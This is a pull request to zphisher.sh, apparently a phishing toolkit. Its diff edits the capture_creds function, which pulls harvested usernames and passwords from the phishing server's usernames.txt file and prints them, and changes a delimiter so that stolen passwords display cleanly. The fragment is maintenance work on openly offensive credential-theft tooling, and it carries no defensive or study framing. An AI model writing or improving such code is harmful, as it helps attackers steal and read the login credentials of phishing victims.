### PR TITLE
Improved graphic appearance on shell

### DIFF
--- a/zphisher.sh
+++ b/zphisher.sh
@@ -357,7 +357,7 @@ capture_ip() {
 ## Get credentials
 capture_creds() {
 	ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | cut -d " " -f2)
-	PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | cut -d ":" -f2)
+	PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | cut -d " " -f2)
 	IFS=$'\n'
 	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
 	echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"


### PR DESCRIPTION
Remove the double space after the password field when printing the obtained password in the shell